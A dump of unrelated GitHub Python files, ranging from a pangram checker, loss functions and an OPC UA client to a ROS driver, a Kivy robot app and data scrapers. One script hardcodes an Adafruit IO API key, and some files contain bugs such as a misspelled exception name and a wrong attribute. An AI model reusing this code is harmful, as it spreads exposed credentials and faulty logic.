print(nwc.fileVersion())\n","repo_name":"cuthbertLab/music21","sub_path":"music21/noteworthy/binaryTranslate.py","file_name":"binaryTranslate.py","file_ext":"py","file_size_in_byte":36806,"program_lang":"python","lang":"en","doc_type":"code","stars":1878,"dataset":"github-code","pt":"72"} +{"seq_id":"74747758952","text":"import string\n\ndef is_pangram(sentence):\n \n # All lowercase Letters in the alphabet\n alfabeto = string.ascii_lowercase \n\n # Create a dictinary with Key \"letter\" and value 1\n all_letters = {letra: 1 for letra in alfabeto}\n \n for each_letter in sentence:\n if each_letter.lower() not in alfabeto:\n continue\n all_letters[each_letter.lower()] -= 1\n \n print(all_letters)\n control = True\n for each in all_letters.values():\n if each > 0:\n control = False\n\n return control\n\nprint(is_pangram('Five quacking Zephyrs jolt my wax bed.'))\n\n\n\n","repo_name":"tiagocazali/Exercism_Python","sub_path":"pangram/pangram.py","file_name":"pangram.py","file_ext":"py","file_size_in_byte":608,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"19667183707","text":"class Character:\n def __init__(self, name, classType, pi, stars, attack=False, defense=False):\n self.name = name\n self.classType = classType\n self.pi = pi\n self.stars = stars\n self.attack = attack\n self.defense = defense\n\n def __str__(self):\n padding = 25 - len(self.name)\n\n temp = \"\\t\" + self.name\n for j in range(padding):\n temp += \" \"\n temp += \"(\" + self.classType + \"):\"\n padding = 10 - len(self.classType)\n for j in range(padding):\n temp += \" \"\n temp += \"%d \" % self.pi\n for i in range(self.stars):\n temp += \"*\"\n if (self.attack == True):\n temp += ' \\tAttacker\\n'\n elif (self.defense == True):\n temp += ' \\tDefender\\n'\n else:\n temp += '\\n'\n return temp\n\n def convertToCsv(self):\n temp = [self.name, self.classType, self.pi, self.stars, self.attack, self.defense]\n return temp\n","repo_name":"dschrimpsher/mcoc_aw_diversity","sub_path":"src/character.py","file_name":"character.py","file_ext":"py","file_size_in_byte":999,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"18083986802","text":"import torch\nimport torch.nn as nn\nimport math\nimport numpy as np\nimport torch.nn.functional as F\n\n\ndef SL_EPE(input_flow, target_flow):\n target_valid = (target_flow < 192) & (target_flow > 0)\n return F.smooth_l1_loss(input_flow[target_valid], target_flow[target_valid], size_average=True)\n\ndef EPE(input_flow, target_flow):\n \n target_valid = target_flow < 192\n return F.l1_loss(input_flow[target_valid], target_flow[target_valid], size_average=True)\n\nclass MultiScaleLoss(nn.Module):\n\n def __init__(self, scales, downscale, weights=None, loss='L1', mask=False):\n super(MultiScaleLoss, self).__init__()\n self.downscale = downscale\n self.mask = mask\n self.weights = torch.Tensor(scales).fill_(1).cuda() if weights is None else torch.Tensor(weights).cuda()\n assert(len(self.weights) == scales)\n\n if type(loss) is str:\n\n if loss == 'L1':\n self.loss = nn.L1Loss()\n elif loss == 'MSE':\n self.loss = nn.MSELoss()\n elif loss == 'SmoothL1':\n self.loss = nn.SmoothL1Loss()\n elif loss == 'MAPE':\n self.loss = MAPELoss()\n else:\n self.loss = loss\n self.multiScales = [nn.AvgPool2d(self.downscale*(2**i), self.downscale*(2**i)) for i in range(scales)]\n print('self.multiScales: ', self.multiScales, ' self.downscale: ', self.downscale)\n\n def forward(self, input, target):\n if (type(input) is tuple) or (type(input) is list):\n out = 0\n \n for i, input_ in enumerate(input):\n target_ = self.multiScales[i](target)\n if self.mask:\n # work for sparse\n mask = target > 0\n mask.detach_()\n \n mask = mask.type(torch.cuda.FloatTensor)\n pooling_mask = self.multiScales[i](mask) \n\n # use unbalanced avg\n target_ = target_ / pooling_mask\n\n mask = target_ > 0\n mask.detach_()\n input_ = input_[mask]\n target_ = target_[mask]\n\n EPE_ = SL_EPE(input_, target_)\n out += self.weights[i] * EPE_\n else:\n out = self.loss(input, self.multiScales[0](target))\n return out\n\ndef multiscaleloss(scales=5, downscale=4, weights=None, loss='L1', sparse=False, mask=False):\n if weights is None:\n weights = (0.005, 0.01, 0.02, 0.08, 0.32)\n if scales == 1 and type(weights) is not tuple:\n weights = (weights, )\n return MultiScaleLoss(scales, downscale, weights, loss, mask)\n","repo_name":"rowandempster/Unsupervised-Disparity-Estimation","sub_path":"src/IRS/losses/multiscaleloss.py","file_name":"multiscaleloss.py","file_ext":"py","file_size_in_byte":2698,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"27550796294","text":"import argparse \nimport datetime\nimport opcua\nimport time \n\n\ndef connect_opcua(conn:str):\n \"\"\"\n Connect to OPCUA client\n :args: \n conn:str - OPCUA connection info \n :param: \n client:opcua.client.client.Client - connection to OPCUA \n start:time.time.time - process start time \n boolean:bool - whether to exit while \n error_msg:list - record of error messages \n :return:\n client \n \"\"\"\n client = None \n start = time.time() \n boolean = False \n error_msg = [] \n while boolean == False:\n try:\n client = opcua.Client(\"opc.tcp://%s/\" % conn)\n client.connect()\n except Exeception as e: \n if e not in error_msg: \n print('%s - Failed to connect to OPCUA (Error: %s)' % (datetime.datetime.now(), e)) \n error_msg.append(e) \n if time.time() > (start * 3605):\n print('%s - FAiled to connect to OPCUA for over an hour' % datetime.datetime())\n status = True \n else: \n time.sleep(30) \n else:\n boolean = True \n\n return client\n\n\ndef disconnect_opcua(client)->bool:\n \"\"\"\n Disconnect from OPCUA\n :args:\n client:opcua.client.client.Client - connection to OPCUA\n :param: \n status:bool \n :return:\n status \n \"\"\"\n status = True \n try:\n client.disconnect()\n except Exception as e: \n print('Faield to disconnect from OPCUA (Error: %s)' % e)\n status = False\n return status \n\n\ndef get_datalogger(client, tags:list)->(dict, str):\n \"\"\"\n Exttract data from logger\n :args: \n client:opcua.client.client.Client - connection to OPCUA \n tags:list - list of tags to get data from for OPCUA \n :param: \n data:dict - data from OPCUA\n :return: \n data and timestamp\n \"\"\"\n data = {'timestamp': datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S.%f')}\n for tag in tags: \n try: \n output = client.get_node(\"ns=4;s=%s\" % tag)\n except Exception as e: \n print('Failed to get data for %s (Error: %s)' % (tag, e))\n output = None\n if output is not None: \n try: \n data[tag] = output.get_value()\n except Exception as e: \n print('Failed to get value for %s data (Error: %s)' % (tag, e))\n\n return data\n\n\ndef main(): \n \"\"\"\n The following is an example of how to pull data from an OPCUA. Tested against the Ai-Ops krt-DataLogger.service \n :links: \n --> Test Tools: https://opcfoundation.org/developer-tools/certification-test-tools/opc-ua-compliance-test-tool-uactt/\n --> OPCUA documentation: https://python-opcua.readthedocs.io/en/latest/\n --> Sample code: https://github.com/FreeOpcUa/python-opcua/tree/master/examples\n :args: \n conn OPCUA connection info [default: 192.168.50.19:4840]\n tags OPCUA list of tags [sample list: FIC11_FB.fActualValue,FIC11_FB.fActualValue,FIC11_FB.fSetpointValue,FIC11_FB.FIC11.fOut]\n :param: \n client:opcua.client.client.Client - connection to the OPCUA \n tags:list - list of tags based based on user input \n data:dict - data from DataLogger \n timestamp:str - timestamp for data from DataLogger \n \"\"\"\n parser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n parser.add_argument('conn', type=str, default='192.168.50.19:4840', help='OPCUA connection info [default: 192.168.50.19:4840]') \n parser.add_argument('tags', type=str, default=None, help='OPCUA list of tags [sample list: FIC11_FB.fActualValue,FIC11_FB.fActualValue,FIC11_FB.fSetpointValue,FIC11_FB.FIC11.fOut]')\n args = parser.parse_args() \n if args.tags == None: \n print('Tags cannot be an empty string') \n exit(1) \n\n try: \n tags = list(args.tags.split(','))\n except Exception as e: \n print('Failed to convert tags into a list of tags (Error: %s)' % e)\n exit(1) \n\n client = connect_opcua(args.conn)\n print(get_datalogger(client, tags))\n disconnect_opcua(client) \n\n\nif __name__ == '__main__': \n main() \n","repo_name":"oshadmon/Udemy","sub_path":"opcua.py","file_name":"opcua.py","file_ext":"py","file_size_in_byte":4234,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"32648015335","text":"import time\nfrom tinydb import TinyDB, Query\ndb = TinyDB('data_buffer.json')\nquery = Query()\n\nfrom Adafruit_IO import *\n# from private import aio_key\naio_key = \"97ab045aa058453b900ba118206a2e31\"\naio = Client(aio_key)\n\ndef get_current_data():\n data = db.all()\n max = 0\n for item in data:\n if item['time'] > max:\n max = item['time']\n print(\"Max time = \", max)\n print(\"# items = \",len(data))\n # delete all items where time <= max\n # db.remove(query.time <= max)\n return data\n\nwhile True:\n data = get_current_data()\n for item in data:\n print('temp', item['value'])\n aio.send('temp', item['value'])\n time.sleep(60*15)\n\n","repo_name":"davidporter/data_streams","sub_path":"final/bitcode/forward_to_adafruitio.py","file_name":"forward_to_adafruitio.py","file_ext":"py","file_size_in_byte":679,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"16421827828","text":"#!/usr/bin/env python3\n\n# Bill Smart, smartw@oregonstate.edu\n#\n# This example gives the basic code for driving a robot around.\n\n\n# Import ROS Python basic API and sys\nimport rospy\nimport sys\n\n\n# Velocity commands are given with Twist messages, from geometry_msgs\nfrom geometry_msgs.msg import Twist\n\n\nif __name__ == '__main__':\n\t# Initialize the node, and call it \"driver\".\n\trospy.init_node('driver', argv=sys.argv)\n\n\t# Set up a publisher. The default topic for Twist messages is cmd_vel.\n\tpublisher = rospy.Publisher('cmd_vel', Twist, queue_size=10)\n\n\t# 10 Hz is a good rate to control a slow-moving robot.\n\trate = rospy.Rate(10)\n\n\t# This will loop until ROS shuts down the node. This can be done on the\n\t# command line with a ctrl-C, or automatically from roslaunch.\n\twhile not rospy.is_shutdown():\n\t\t# Create a Twist and fill in the information. Note that we fill in values\n\t\t# even for the elements we're not going to use. We don't have to do this,\n\t\t# but it's good practice.\n\t\tt = Twist()\n\t\tt.linear.x = 0.2\n\t\tt.linear.y = 0.0\n\t\tt.linear.z = 0.0\n\t\tt.angular.x = 0.0\n\t\tt.angular.y = 0.0\n\t\tt.angular.z = 0.0\n\n\t\t# Publish the velocity command.\n\t\tpublisher.publish(t)\n\n\t\t# Print out a log message to the INFO channel to let us know it's working.\n\t\trospy.loginfo(f'Published {t.linear.x}')\n\n\t\t# Make sure we're publishing a tthe right rate.\n\t\trate.sleep()","repo_name":"OSUrobotics/ROB514","sub_path":"Shell_code_ROS/lab1/src/driver.py","file_name":"driver.py","file_ext":"py","file_size_in_byte":1360,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"72"} +{"seq_id":"25678811758","text":"import fire, random, os, shutil, openai, concurrent, time\nfrom utils import get_task, prompt_global, call_gpt\nimport itertools\nimport numpy as np\nimport json, traceback\n\ndef gpt(env, prompt, model=\"gpt-4-0613\", temperature=0.7, max_tokens=1000, n=1, stop=None) -> list: # for tot\n messages = [{\"role\": \"user\", \"content\": prompt}]\n while True:\n try:\n response = openai.ChatCompletion.create(\n model=model,\n messages=messages,\n temperature=temperature,\n max_tokens=max_tokens,\n n=n,\n request_timeout=600,\n )\n env.completion_tokens += response[\"usage\"][\"completion_tokens\"]\n env.prompt_tokens += response[\"usage\"][\"prompt_tokens\"]\n return [choice[\"message\"][\"content\"] for choice in response[\"choices\"]]\n except:\n print(traceback.format_exc())\n time.sleep(10)\n\ndef get_value(env, x, y, n_evaluate_sample, cache_value=True):\n value_prompt = env.value_prompt_wrap(x, y)\n if cache_value and value_prompt in env.value_cache:\n return env.value_cache[value_prompt]\n value_outputs = gpt(env, value_prompt, n=n_evaluate_sample, stop=None)\n value = env.value_outputs_unwrap(x, y, value_outputs)\n if cache_value:\n env.value_cache[value_prompt] = value\n return value\n\ndef get_values(env, x, ys, n_evaluate_sample, cache_value=True):\n values = []\n local_value_cache = {}\n for y in ys: # each partial output\n if y in local_value_cache: # avoid duplicate candidates\n value = 0\n else: \n value = get_value(env, x, y, n_evaluate_sample, cache_value=cache_value)\n local_value_cache[y] = value\n values.append(value)\n return values\n\ndef get_proposals(env, x, y): # for tot\n propose_prompt = env.propose_prompt_wrap(x, y)\n proposals = gpt(env, propose_prompt, n=1, stop=None)[0].split('\\n')\n return [y + _ + '\\n' for _ in proposals]\n\ndef run_an_instance(task, group, split, i, line, shot, consistency, tot_width):\n try:\n print(task, group, split, i, '['+line+']', shot, consistency, tot_width)\n env = get_task(task)\n env.shot = shot\n \n if group == 'tot':\n output_dir = f'tasks/{task}/output/{group}_{shot}shot_{consistency}cons_{tot_width}width/{split}'\n else:\n output_dir = f'tasks/{task}/output/{group}_{shot}shot_{consistency}cons/{split}'\n \n os.makedirs(output_dir, exist_ok=True)\n if group == 'tot':\n assert split == 'valid'\n if os.path.exists(f'{output_dir}/{i}.out'):\n return\n x = line\n ys = [''] # current output candidates\n infos = []\n for step in range(env.get_steps(line)):\n # generation\n new_ys = [get_proposals(env, x, y) for y in ys]\n new_ys = list(itertools.chain(*new_ys))\n print(x, new_ys)\n ids = list(range(len(new_ys)))\n # evaluation\n values = get_values(env, x, new_ys, consistency)\n print(values)\n # selection\n select_ids = sorted(ids, key=lambda x: values[x], reverse=True)[:tot_width]\n select_new_ys = [new_ys[select_id] for select_id in select_ids]\n \n infos.append({'step': step, 'x': x, 'ys': ys, 'new_ys': new_ys, 'values': values, 'select_new_ys': select_new_ys})\n ys = select_new_ys\n \n with open(f'{output_dir}/{i}.json', 'w') as f:\n json.dump(infos, f, indent=4)\n\n for T, y in enumerate(ys):\n open(f'{output_dir}/{i}_{T}.out', 'w').write(y)\n res = ys[0]\n for y in ys:\n # if env.check_conclu(x, y):\n if env.check(x, y):\n res = y\n open(f'{output_dir}/{i}.out', 'w').write(res)\n usage_prompt, usage_generate = env.prompt_tokens, env.completion_tokens\n open(f'{output_dir}/{i}.log', 'w').write(f'{usage_prompt} {usage_generate}')\n \n if group == 'cot' or group == 'nct':\n if not os.path.exists(f'{output_dir}/{i}.in'):\n open(f'{output_dir}/{i}.in', 'w').write(env.prompt_input(line))\n messages = [\n {\"role\": \"system\", \"content\": prompt_global()},\n {\"role\": \"user\", \"content\": env.prompt_input(line)},\n ]\n if group == 'cot':\n messages = messages[1:]\n if shot >= 1:\n messages = messages[:-1] + env.prompt_few_shot(group, shot) + messages[-1:]\n if not os.path.exists(f'{output_dir}/{i}.out'):\n res_list, usage_prompt, usage_generate = call_gpt(messages, consistency)\n open(f'{output_dir}/{i}.log', 'w').write(f'{usage_prompt} {usage_generate}')\n for T in range(consistency):\n open(f'{output_dir}/{i}_{T}.out', 'w').write(res_list[T])\n for T in range(consistency):\n if env.check(line, res_list[T]) or (T==consistency-1 and split=='valid'):\n shutil.copy2(f'{output_dir}/{i}_{T}.out', f'{output_dir}/{i}.out')\n break\n except:\n print(traceback.format_exc())\n\ndef run(task='GraphGame', group='nct', split='valid', shot=0, consistency=1, tot_width=5):\n data = open(f'tasks/{task}/data/{split}.txt', 'r')\n \n ex = concurrent.futures.ProcessPoolExecutor(10)\n \n for i, line in enumerate(data):\n line = line.strip('\\n')\n if len(line) < 2: continue\n ex.submit(run_an_instance, task, group, split, i, line, shot, consistency, tot_width)\n # run_an_instance(task, group, split, i, line, shot, consistency, tot_width)\n \n ex.shutdown(wait=True)\n \n return\n\nif __name__ == '__main__':\n fire.Fire(run)\n","repo_name":"ZheyuAqaZhang/Autonomous-Tree-search","sub_path":"GPT_Experiment/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":5992,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"38317806526","text":"import sys\r\nsys.path.insert(1, './utils')\r\n\r\nfrom kivy.config import Config\r\nConfig.set('kivy', 'exit_on_escape', '0')\r\nConfig.set('input', 'mouse', 'mouse,multitouch_on_demand')\r\n\r\n\r\nfrom kivy.app import App\r\nfrom kivy.uix.boxlayout import BoxLayout\r\nfrom kivy.uix.floatlayout import FloatLayout\r\nfrom kivy.core.window import Window\r\nfrom kivy.clock import Clock\r\n\r\nimport cv2\r\nimport numpy as np\r\n\r\nfrom kivyclasses import *\r\nfrom colortools import *\r\nfrom console import *\r\nfrom messages import *\r\nfrom sleeptools import *\r\nfrom datalink import *\r\nfrom mapping import *\r\nfrom helpfuncs import *\r\n\r\n\r\nclass MainWindow(App):\r\n def build(self):\r\n min_window = (1280, 720)\r\n Window.minimum_width, Window.minimum_height = min_window\r\n Window.size = min_window\r\n\r\n self.window = BoxLayout(orientation='vertical')\r\n\r\n white = Color(255, 255, 255)\r\n mostly_white = Color(240, 240, 240)\r\n light_gray = Color(200, 200, 200)\r\n gray = Color(178, 190, 195)\r\n leafy_green = Color(109, 163, 39)\r\n dark_green = Color(44, 74, 4)\r\n sunset_orange = Color(207, 94, 37)\r\n sunset_purple = Color(181, 66, 201)\r\n gunmetal = Color(45, 52, 54)\r\n dim_gray = Color(99, 110, 114)\r\n dark_gray = Color(70, 70, 70)\r\n\r\n header_cc = ColorComponent(gray, light_gray, POS_TOP_CENTER, POS_BOT_CENTER)\r\n headerdiv_cc = ColorComponent(sunset_orange, sunset_purple, POS_LEFT, POS_RIGHT, txtsize=3)\r\n shelf_cc = ColorComponent(dark_gray, dim_gray)\r\n vdiv_cc = ColorComponent(dim_gray, dark_gray)\r\n window_cc = ColorComponent(dim_gray, dark_gray, POS_TOP_CENTER, POS_BOT_CENTER)\r\n\r\n settings = IconButton(\r\n icon_normal=\"./assets/settings.png\",\r\n icon_pressed=\"./assets/settings_pressed.png\"\r\n )\r\n\r\n self.header = Header(\r\n size_hint=(1, 0.1),\r\n color_component=header_cc,\r\n title_image=\"./assets/title.png\",\r\n buttons=[settings]\r\n )\r\n\r\n self.header_div = Divider(\r\n size_hint=(1, 0.01),\r\n color_component=headerdiv_cc,\r\n rotate_speed=10\r\n )\r\n\r\n self.content_window = BoxLayout(orientation='horizontal')\r\n\r\n home = IconButton(\r\n icon_normal=\"./assets/home.png\",\r\n icon_pressed=\"./assets/home_pressed.png\"\r\n )\r\n\r\n console = IconButton(\r\n icon_normal=\"./assets/console.png\",\r\n icon_pressed=\"./assets/console_pressed.png\"\r\n )\r\n\r\n shelf_div1 = Divider(\r\n size_hint=(None, 0.005),\r\n color_component=headerdiv_cc\r\n )\r\n\r\n shelf_div2 = Divider(\r\n size_hint=(None, 0.005),\r\n color_component=headerdiv_cc\r\n )\r\n\r\n self.widget_shelf = WidgetShelf(\r\n [home, shelf_div1, console, shelf_div2],\r\n color_component=shelf_cc,\r\n size_hint=(0.175, 1)\r\n )\r\n\r\n self.shelf_content_div = Divider(\r\n width=10,\r\n size_hint=(None, 1),\r\n color_component=vdiv_cc\r\n )\r\n\r\n self.main_content = FloatLayout()\r\n\r\n self.console_pane = ConsolePane(\r\n size_hint=(0.5, 0.9),\r\n pos_hint={'x': 0.05},\r\n color_component=window_cc,\r\n bar_color_component=headerdiv_cc\r\n )\r\n\r\n self.settings_pane = SettingsPane(\r\n size_hint=(0.95, 0.95),\r\n pos_hint={'right': 1},\r\n color_component=window_cc,\r\n bar_color_component=headerdiv_cc\r\n )\r\n\r\n self.image_viewer = ImagePane(\r\n size_hint=(0.5, 1),\r\n pos_hint={'right': 1}\r\n )\r\n\r\n self.map_viewer = ImagePane(\r\n size_hint=(0.5, 1),\r\n pos_hint={'right': 0.5}\r\n )\r\n\r\n\r\n\r\n self.window.add_widget(self.header)\r\n self.window.add_widget(self.header_div)\r\n\r\n self.window.add_widget(self.content_window)\r\n\r\n self.content_window.add_widget(self.widget_shelf)\r\n self.content_window.add_widget(self.shelf_content_div)\r\n self.content_window.add_widget(self.main_content)\r\n\r\n self.main_content.add_widget(self.image_viewer)\r\n self.main_content.add_widget(self.map_viewer)\r\n self.main_content.add_widget(self.console_pane)\r\n self.main_content.add_widget(self.settings_pane)\r\n\r\n\r\n\r\n settings.set_callback(self.settings_pressed)\r\n home.set_callback(self.home_pressed)\r\n console.set_callback(self.console_pressed)\r\n\r\n\r\n Clock.schedule_interval(self._background_tasks, 1/100)\r\n Clock.schedule_interval(self._update_viewer, 1/60)\r\n self._con = Console()\r\n self._cmm = ConsoleMemoryManager(max_char_count=2**11)\r\n self._rc_mode = False\r\n\r\n self._robot_connected = False\r\n self._high_latency = False\r\n self._link = None\r\n self._link_rc_rate = Rate(25)\r\n\r\n self._img = None\r\n self._map = None\r\n self._new_img = False\r\n self._new_map = False\r\n self._colors = load_colors(\"./files/colors.txt\")\r\n\r\n return self.window\r\n\r\n def settings_pressed(self):\r\n if self.settings_pane.is_open():\r\n self.settings_pane.close()\r\n else:\r\n self.settings_pane.open()\r\n\r\n def home_pressed(self):\r\n self.console_pane.close()\r\n self.settings_pane.close()\r\n\r\n def console_pressed(self):\r\n if self.console_pane.is_open():\r\n self.console_pane.close()\r\n else:\r\n self.console_pane.open()\r\n\r\n def _connect(self, ip, port):\r\n if self._link is not None:\r\n self._link.stop()\r\n self._link = DataLink(\"client\", False, host=ip, port=port)\r\n self._link.start()\r\n\r\n def _update_viewer(self, dt):\r\n if self._new_img:\r\n self.image_viewer.set_image(self._img)\r\n self._new_img = False\r\n if self._new_map:\r\n img = map_to_image(self._map, self._colors)\r\n self.map_viewer.set_image(img)\r\n self._new_map = False\r\n\r\n def _background_tasks(self, dt):\r\n \"\"\" LINK STUFF \"\"\"\r\n self._robot_connected = self._link is not None and self._link.latency() is not float('inf')\r\n if self._robot_connected:\r\n self._high_latency = self._link.latency() > 0.5\r\n\r\n if self._robot_connected:\r\n while self._link.data_available():\r\n msg = self._link.get()['data']\r\n if msg['type'] == 'status':\r\n pass\r\n elif msg['type'] == 'image_stream':\r\n self._img = np.float32(cv2.imdecode(msg['data'], cv2.IMREAD_COLOR)) / 255\r\n self._new_img = True\r\n elif msg['type'] == 'map_stream':\r\n self._map = msg['data']\r\n self._new_map = True\r\n\r\n \"\"\" CONSOLE STUFF \"\"\"\r\n if self.console_pane.is_open() and not self._con.is_enabled():\r\n self._con.enable()\r\n elif not self.console_pane.is_open() and self._con.is_enabled():\r\n self._con.disable()\r\n\r\n if self._rc_mode and not self._con.is_rc_mode():\r\n self._rc_mode = False\r\n self.print(\"Leaving RC mode.\")\r\n\r\n if self._con.data_available():\r\n if self._con.is_rc_mode():\r\n self._rc_mode = True\r\n if self._link_rc_rate.ready():\r\n if self._robot_connected:\r\n self._link.send(rc_msg(self._con.get()))\r\n else:\r\n cmd = self._con.get().lower()\r\n self.buffer_print(\"\")\r\n self.print(cmd, timestamp=True)\r\n if cmd == \"\":\r\n pass\r\n elif cmd == \"rc\":\r\n self.print(\"Entering RC mode, hit [esc] (escape key) to exit.\")\r\n if not self._robot_connected:\r\n self.warn(\"Robot is not connected.\")\r\n elif self._high_latency:\r\n self.warn(f\"High latency may result in unwanted actions. Current latency: {self._link.latency(string=True)}\")\r\n\r\n self._con.set_rc_mode(True)\r\n self._link_rc_rate.set_start()\r\n elif cmd[:5] == \"send \":\r\n self.print(f\"Sending \\\"{cmd[5:]}\\\"\")\r\n if not self._robot_connected:\r\n self.warn(\"Robot is not connected.\")\r\n else:\r\n self._link.send(cmd_msg(cmd[5:]))\r\n elif cmd[:8] == \"connect \":\r\n try:\r\n parts = cmd[8:].split('@')\r\n ip = parts[0]\r\n port = int(parts[1])\r\n self.print(f\"Connecting to {ip}@{port}\")\r\n self._connect(ip, port)\r\n except (IndexError, ValueError) as e:\r\n self.warn(\"Error parsing connection command.\")\r\n elif cmd == \"ping\":\r\n if not self._robot_connected:\r\n self.warn(\"Robot is not connected.\")\r\n else:\r\n self.print(self._link.latency(string=True))\r\n elif cmd == \"clear\":\r\n self._cmm.clear()\r\n self.update_console()\r\n elif cmd == \"quit\":\r\n self.print(\"Exiting application...\")\r\n if self._robot_connected:\r\n self.warn(\"Robot is still connected. This command will not stop the robot.\")\r\n self.warn(\"To quit while connected, enter \\\"quit -f\\\"\")\r\n else:\r\n self._stop()\r\n elif cmd == \"quit -f\":\r\n self.print(\"Exiting application...\")\r\n self._stop()\r\n elif cmd == \"help\":\r\n self.buffer_print(\"\\\"rc\\\": enter remote control mode, escape to quit.\")\r\n self.buffer_print(\"\\\"send ...\\\": send a command directly to the robot.\")\r\n self.buffer_print(\"\\\"connect ...ip...@...port...\\\": connect to the robot.\")\r\n self.buffer_print(\"\\\"ping\\\": get latest robot ping.\")\r\n self.buffer_print(\"\\\"clear\\\": clear the console.\")\r\n self.print(\"\\\"quit\\\": exit the application when the robot is not connected. Use \\\"-f\\\" to force quit.\")\r\n else:\r\n self.warn(f\"Unrecognized command \\\"{cmd}\\\". Type \\\"help\\\" for a list of commands.\")\r\n\r\n self.console_pane.set_input_text(self._con.get_current())\r\n\r\n def buffer_print(self, text, end='\\n', timestamp=False):\r\n if type(text) is not str:\r\n text = str(text)\r\n self._cmm.print(text, end=end, timestamp=timestamp)\r\n\r\n def print(self, text, end='\\n', timestamp=False):\r\n self.buffer_print(text, end=end, timestamp=timestamp)\r\n self.update_console()\r\n\r\n def warn(self, text, end='\\n', timestamp=False):\r\n text = \"[WARN] \" + text\r\n self.print(text, end=end, timestamp=timestamp)\r\n\r\n def update_console(self):\r\n self.console_pane.set_window_text(self._cmm.get())\r\n\r\n def _stop(self):\r\n self._con.stop()\r\n if self._link is not None:\r\n self._link.stop()\r\n self.stop()\r\n\r\n\r\nif __name__ == '__main__':\r\n MainWindow().run()\r\n","repo_name":"peempeem/Lawnmower","sub_path":"src/app/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":11516,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"30763003307","text":"from django.db import models\nimport os\nfrom twilio.rest import Client\n\nclass Score(models.Model):\n result = models.PositiveIntegerField()\n\n def __str__(self):\n return str(self.result)\n def save(self,*args,**kwargs):\n if self.result <70:\n account_sid = 'XXXXXXXXXX'\n auth_token = 'XXXXXXXXX'\n client = Client(account_sid, auth_token)\n\n message = client.messages.create(\n body=f'Your score is: {self.score} ',\n from_='+xxxxxxx',\n to='+xxxxxx'\n )\n\n print(message.sid)\n return super().save(*args,**kwargs)\n \n \n","repo_name":"mzoughyy/SMS-Sender","sub_path":"scores/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":713,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"32672158179","text":"from gazpacho import get, Soup\nurl = \"https://tax.alaska.gov/programs/oil/production/ans.aspx?\"\nhtml = get(url)\nsoup = Soup(html)\n\nlist = soup.find('option')[1:]\nlength = len(list)\n\n# base_url = \"https://tax.alaska.gov/programs/oil/production/ans.aspx?\"\nurls = []\n\nfor i in range(length):\n options = list[i].attrs['value']\n urls.append(url + options)\n\nlen(urls)\n\nimport pandas as pd\n\ndata = []\n\n# df = df.rename(columns = {0:'date', 1:'prudhoe', 2:'kaparuk', 3:'endicott', 4:'lisburne', 5:'alpine', 6:'ans', 7:'inventories'})\n# df.columns\n# df.reset_index()\n\nfor url in urls:\n df = pd.read_html(url)[6]\n df = df.loc[2:]\n df[1] = pd.to_numeric(df[1],errors='coerce')\n df[2] = pd.to_numeric(df[2],errors='coerce')\n df[3] = pd.to_numeric(df[3],errors='coerce')\n df[4] = pd.to_numeric(df[4],errors='coerce')\n df[5] = pd.to_numeric(df[5],errors='coerce')\n df[6] = pd.to_numeric(df[6],errors='coerce')\n df[7] = pd.to_numeric(df[7],errors='coerce')\n del df[8]\n del df[9]\n del df[10]\n del df[11]\n del df[12]\n df = df.dropna(how='any')\n df = df[df[0] != 'Average']\n df.to_csv('alaska-oil-production/akdor_oil_production.csv', mode='a', header=False, index=False)","repo_name":"dianewitt/12-web-scraping","sub_path":"alaska-oil-production/archive/scrape_akdor_oil_production.py","file_name":"scrape_akdor_oil_production.py","file_ext":"py","file_size_in_byte":1210,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"41918091769","text":"from pyspark.sql import SparkSession\nfrom pyspark.sql.functions import from_json, to_json, col, unbase64, base64, split, expr\nfrom pyspark.sql.types import StructField, StructType, StringType, BooleanType, ArrayType, DateType, FloatType\n\nredisSchema = StructType(\n [\n StructField(\"key\", StringType()),\n StructField(\"value\", StringType()),\n StructField(\"expiredType\", StringType()),\n StructField(\"expiredValue\",StringType()),\n StructField(\"existType\", StringType()),\n StructField(\"ch\", StringType()),\n StructField(\"incr\",BooleanType()),\n StructField(\"zSetEntries\", ArrayType( \\\n StructType([\n StructField(\"element\", StringType()),\\\n StructField(\"score\", StringType()) \\\n ])) \\\n )\n\n ]\n)\n\ncustomerSchema = StructType(\n [\n StructField(\"customerName\", StringType()),\n StructField(\"email\", StringType()),\n StructField(\"phone\", StringType()),\n StructField(\"birthDay\", StringType())\n ]\n)\n\nstediSchema = StructType(\n [\n StructField(\"customer\", StringType()),\n StructField(\"score\", FloatType()),\n StructField(\"riskDate\", DateType())\n ]\n)\n\nspark = SparkSession.builder.appName(\"STEDI Dashboard\").getOrCreate()\n\nspark.sparkContext.setLogLevel(\"WARN\")\n\nredisRawStream = spark \\\n .readStream \\\n .format(\"kafka\") \\\n .option(\"kafka.bootstrap.servers\", \"localhost:9092\") \\\n .option(\"subscribe\", \"redis-server\") \\\n .option(\"startingOffsets\", \"earliest\") \\\n .load()\n\nredisDF = redisRawStream.selectExpr(\"cast(value as string) value\")\n\nredisStreamingDF = redisDF.withColumn(\"value\", from_json(\"value\", redisSchema)) \\\n .select(col(\"value.*\")) \\\n .createOrReplaceTempView(\"RedisSortedSet\")\n\nredisEncodedDF = spark.sql(\"select key, zSetEntries[0].element as redisEvent from RedisSortedSet\")\n\nredisDecodedDF = redisEncodedDF.withColumn(\"redisEvent\", 